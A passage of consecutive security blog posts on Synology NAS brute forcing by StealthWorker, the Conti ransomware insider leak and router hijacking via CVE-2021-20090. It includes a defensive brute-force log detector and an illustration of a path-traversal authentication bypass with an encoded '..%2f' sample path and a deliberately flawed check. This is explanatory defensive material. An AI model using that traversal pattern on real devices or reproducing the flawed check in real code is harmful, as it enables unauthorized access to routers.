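What “auto block” is doing under the hood, and the case it misses, as an added example (this is not the article’s or Synology’s code, and the log format is not Synology’s): the detector below replays authentication log lines and applies two rules. The first is the per-source rule auto block implements: N failures from one IP inside a window gets that IP blocked. The second is the one a botnet like this can slip past by spreading its guesses across many infected hosts, so it counts how many distinct sources are failing against the same account. It also reports a success from a source that had already crossed the threshold, which is the event worth paging on. The log lines themselves are constructed for the demonstration.

```python
"""Replay auth logs to detect brute forcing: per-source (what auto block does)
and per-account across many sources (what a botnet relies on slipping past).
Added example; the log format and lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) auth: (?P<result>Failed|Accepted) login from (?P<ip>\S+) user (?P<user>\S+)$"
)


def parse_line(line):
    """Return (timestamp, result, ip, user) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["result"], m["ip"], m["user"]


def detect_bruteforce(lines, per_ip=5, per_user_sources=10, window=timedelta(minutes=10)):
    """Sliding-window detector.
    per_ip: failures from one source inside `window` that get it blocked.
    per_user_sources: distinct sources failing against one account inside `window`
                      that mark the account as under distributed attack.
    Returns dict with 'block_ips', 'targeted_users' and 'suspicious_success'
    (logins accepted from a source that was already over the threshold)."""
    ip_failures = defaultdict(deque)    # ip   -> timestamps of failures
    user_failures = defaultdict(deque)  # user -> (timestamp, ip) of failures
    block_ips, targeted_users, suspicious = set(), set(), []

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, result, ip, user = rec

        if result == "Accepted":
            if ip in block_ips:
                suspicious.append((ts, ip, user))
            continue

        q = ip_failures[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= per_ip:
            block_ips.add(ip)

        uq = user_failures[user]
        uq.append((ts, ip))
        while uq and ts - uq[0][0] > window:
            uq.popleft()
        if len({src for _, src in uq}) >= per_user_sources:
            targeted_users.add(user)

    return {"block_ips": block_ips, "targeted_users": targeted_users,
            "suspicious_success": suspicious}


def sample_log():
    """Constructed log lines: one noisy source, one low-and-slow botnet, one typo-prone user."""
    base = datetime(2021, 8, 9, 10, 0, 0)
    fmt = "{ts} auth: {result} login from {ip} user {user}"
    lines = []
    # Six failures in two minutes from one address, then it gets in.
    for i in range(6):
        lines.append(fmt.format(ts=(base + timedelta(seconds=20 * i)).isoformat(),
                                result="Failed", ip="198.51.100.7", user="admin"))
    lines.append(fmt.format(ts=(base + timedelta(minutes=3)).isoformat(),
                            result="Accepted", ip="198.51.100.7", user="admin"))
    # Ten different addresses, one guess each, all against the same account.
    for i in range(10):
        lines.append(fmt.format(ts=(base + timedelta(minutes=4, seconds=30 * i)).isoformat(),
                                result="Failed", ip=f"203.0.113.{i + 1}", user="admin"))
    # A real user who mistyped twice.
    for offset, result in ((300, "Failed"), (330, "Failed"), (360, "Accepted")):
        lines.append(fmt.format(ts=(base + timedelta(seconds=offset)).isoformat(),
                                result=result, ip="192.0.2.10", user="alice"))
    return lines


if __name__ == "__main__":
    report = detect_bruteforce(sample_log())
    print("block:", sorted(report["block_ips"]))
    print("accounts under distributed attack:", sorted(report["targeted_users"]))
    print("successful logins from blocked sources:", report["suspicious_success"])
```

The per-IP rule alone never fires on the ten botnet sources, which is exactly why a strong password and MFA on the account matter more than the blocklist: the second rule tells you an account is being worked on, but only a credential the botnet cannot guess stops it.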

Synology also advises users to enable snapshots to keep their NAS safe from encryption-based ransomware. Snapshots are point-in-time copies kept on the device itself, so they help only if the attacker cannot delete them with the credentials they have guessed; pair them with a regular, off-site backup. More Synology NAS-specific security advice can be found on its site.

The company’s advice is also valid for any other Internet-facing NAS devices. Synology only reports the attacks performed on its own devices, but that might simply be because that is where it has a clear picture of what’s going on. It does not mean other devices are being neglected by the botnet. There is no reason for StealthWorker, or other botnets, to pass up on other manufacturers’ devices.

Stay safe, everyone!

The post Check your passwords! Synology NAS devices under attack from StealthWorker appeared first on Malwarebytes Labs.

Ransomware turncoat leaks Conti data, lifts the lid on the ransomware business

Last week, The Record broke the news that a self-described “pen tester” for the infamous Conti ransomware gang, who goes by the handle m1Geelka, had leaked manuals, technical guides, and software on the underground forum XSS. According to the screenshot of m1Geelka’s original forum post—and screenshots of later ones from several security researchers being passed around on Twitter—their problem seems to be (surprise, surprise) money: Conti isn’t paying “hard workers” enough of what it extorts.

If you’ve heard of Conti, it’s likely in connection with a devastating attack on Ireland’s Health Service Executive in May. The attack affected the provision of healthcare across the entire country, causing hundreds of thousands of appointments to be scrapped.

m1Geelka’s rant starts:

Dumb divorce, not work. They recruit penetration testers, of course … They recruit guys to test Active Directory networks, they use the Locker – Conti. I merge you their 10-address of cobalt servers and type of training materials. 1500 $ yes, of course, they recruit suckers and divide the money among themselves, and the boys are fed with what they will let them know when the victim pays.

The reference to “their 10-address cobalt servers and type of training materials” refers to the materials m1Geelka leaked on the forum, which included the IP addresses of the Conti gang’s Cobalt Strike command and control servers.

Aside from the tactics, techniques and procedures (TTPs), the leak comes with a few interesting lessons:

Ransomware is an industry

The leak further reinforces something we already knew: that ransomware is a mature criminal business that includes cooperation between groups, the division of labor, extensive outsourcing, and competition for skilled workers.

According to one observer, Conti’s recruitment on the XSS forum tries to induce potential “pen testers” like m1Geelka with familiar-sounding work conditions, such as fully remote working, a salary of $1,500 plus a percentage of the spoils from attacks, and a five-day work week (yup, you get weekends off).

Others reported that m1Geelka later suffered a case of buyer’s remorse and walked back some of their claims, saying they were never an affiliate of Conti and that they had only leaked data that was already public. Perhaps somebody reminded them that some things are done differently in the underground economy.

Everyone is vulnerable to insider threats

Although some see this leak as an example of there being “no honor among thieves”, it isn’t. Disgruntled employees or contractors exist in all walks of life, and occasionally take out their frustration on employers’ computers, networks, and data. The leak is simply another example of how unexceptional the ransomware economy is.

These kinds of incidents happen everywhere—they even happen at the FBI—and, according to the UK’s National Crime Agency, they happened more in 2020 than in 2019 because of the disruption caused by the pandemic.

Which means it can happen to you, and your approach to security should account for it.

Conti cares about your revenue

Modern ransomware attacks are often described as “targeted”, but there is some misunderstanding about what that means. Most of the time it means that attackers focus on one target at a time, rather than attacking as many targets as possible.

A small detail of the Conti leak reported by NBC shows that Conti documentation encourages attackers to investigate potential targets in Google—searching for “WEBSITE + revenue”—and reminds them to check multiple sources, so they get an accurate number.

The advice appears in “MANALS_V2 Active Directory”, listed in a section called “Increasing privileges and collecting information”, and appears to be one of the steps attackers are told to take after breaking into a target’s network. If attackers are discovering this kind of information after they’ve broken in rather than before, it shows they aren’t going after specific targets, merely vulnerable ones.

The post Ransomware turncoat leaks Conti data, lifts the lid on the ransomware business appeared first on Malwarebytes Labs.

A week in security (August 2 – August 8)

Last week on Malwarebytes Labs:

Other cybersecurity news:

Stay safe!

The post A week in security (August 2 – August 8) appeared first on Malwarebytes Labs.

Home routers are being hijacked using vulnerability disclosed just 2 days ago

The early bird catches the worm. Unless the worm was early enough to hide.

On August 3, 2021 a vulnerability that was discovered by Tenable was made public. Only two days later, on August 5, Juniper Threat Labs identified some attack patterns that attempted to exploit this vulnerability in the wild. The vulnerability is listed as CVE-2021-20090.

Router firmware

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Under the description of CVE-2021-20090 you will find:

“a path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.”

But during the disclosure process for the issues discovered in the Buffalo routers, Tenable found that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. In its synopsis, Tenable lists some 36 devices that have been confirmed to be affected. The list of affected devices includes some of today’s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.

The path traversal vulnerability means that some files on the devices can be accessed without authentication because they fall under a bypass list. Attackers can use this vulnerability to bypass authentication procedures on the affected routers and modems to enable the Telnet service, which will allow threat actors to connect to devices remotely and take over control of the affected device. The full technical details of the discovery and the Proof-of-Concept (PoC) can be found in the Tenable TechBlog.
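The combination described above, a list of paths served without a login plus a path traversal, typically becomes an authentication bypass when the bypass list is consulted against the raw request path before it is normalized. The following is an added illustration of that pattern and its fix, not Tenable’s PoC or the Arcadyan firmware code; the prefixes and request paths are constructed placeholders.

```python
import posixpath
from urllib.parse import unquote

# Constructed placeholder bypass list: paths an embedded web server would serve
# without authentication (static assets). Not the real firmware's list.
NO_AUTH_PREFIXES = ("/images/", "/css/", "/js/")


def needs_auth_vulnerable(raw_path: str) -> bool:
    """Flawed check: the bypass list is matched against the raw request path.

    A request such as /images/..%2f..%2fcgi-bin/admin still begins with
    /images/, so it is wrongly treated as a public static file even though
    the file-serving code later decodes and resolves it elsewhere.
    """
    return not raw_path.startswith(NO_AUTH_PREFIXES)


def canonicalize(raw_path: str) -> str:
    """Return the canonical absolute path the request actually resolves to.

    Percent-decoding is applied twice to also catch double-encoded dots and
    slashes; posixpath.normpath then collapses '.', '..' and repeated slashes.
    Because the path is anchored at '/', '..' cannot climb above the root.
    """
    decoded = unquote(unquote(raw_path))
    return posixpath.normpath("/" + decoded.lstrip("/"))


def needs_auth_hardened(raw_path: str) -> bool:
    """Hardened check: decide on the canonical path, never on the raw one.

    The same canonical path must be the one the server opens; deciding on one
    form and serving another is exactly what reintroduces the bypass.
    """
    if "\\" in raw_path or "\x00" in raw_path:
        return True  # odd separators or NUL bytes never qualify as public assets
    return not canonicalize(raw_path).startswith(NO_AUTH_PREFIXES)


def classify(raw_path: str) -> dict:
    """Summarize how both checks treat a request, for log review or testing."""
    return {
        "resolves_to": canonicalize(raw_path),
        "vulnerable_requires_auth": needs_auth_vulnerable(raw_path),
        "hardened_requires_auth": needs_auth_hardened(raw_path),
    }
```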

Quick response

Once again, the importance of responsible disclosure is demonstrated since it only took threat actors two days after the publication of a PoC to add this vulnerability to their arsenal. The threat actor seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar to those found to be used against devices from vendors like SonicWall, D-Link, Netgear, Cisco, Tenda, MicroFocus, and Netis. This same threat actor was found earlier to serve a Mirai variant leveraging CVE-2021-27561 and CVE-2021-27562, just hours after vulnerability details were published.

Mirai

Mirai is the name of the malware behind one of the most active and well-known Internet-of-Things (IoT) botnets. It started with Mirai taking advantage of insecure IoT devices in a simple but clever way. It scanned big blocks of the internet for open Telnet ports, then attempted to log in using default passwords. In this way, it was able to quickly corral an army of small, Internet-connected “smart” devices, like cameras, into a botnet.

You may remember hearing about this botnet after the massive East Coast internet outage of 2016 when the Mirai botnet was leveraged in a DDoS attack aimed at Dyn, an Internet infrastructure company. Traffic to Dyn’s Internet directory servers throughout the US—primarily on the East Coast but later on the opposite end of the country as well—was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.

After the source code of the original Mirai botnet was leaked, this code was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets. These operators are engaged in an ongoing competition to find new victims and hijack devices from each other. The original authors of Mirai were convicted for leasing their botnet out for DDoS attacks and click fraud. But their successors are still very much using the foundations of the first Mirai botnet.

Mitigation

The vulnerability was patched in April, and owners of any of the affected devices listed in Tenable’s synopsis are advised to ask their router vendor for security patches. Tenable reported the issues to the CERT Coordination Center for help with contacting and tracking all the affected vendors.

What is worrying about the current situation is that many of the owners of vulnerable devices are home users that were provided with the device by their internet provider. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.

The post Home routers are being hijacked using vulnerability disclosed just 2 days ago appeared first on Malwarebytes Labs.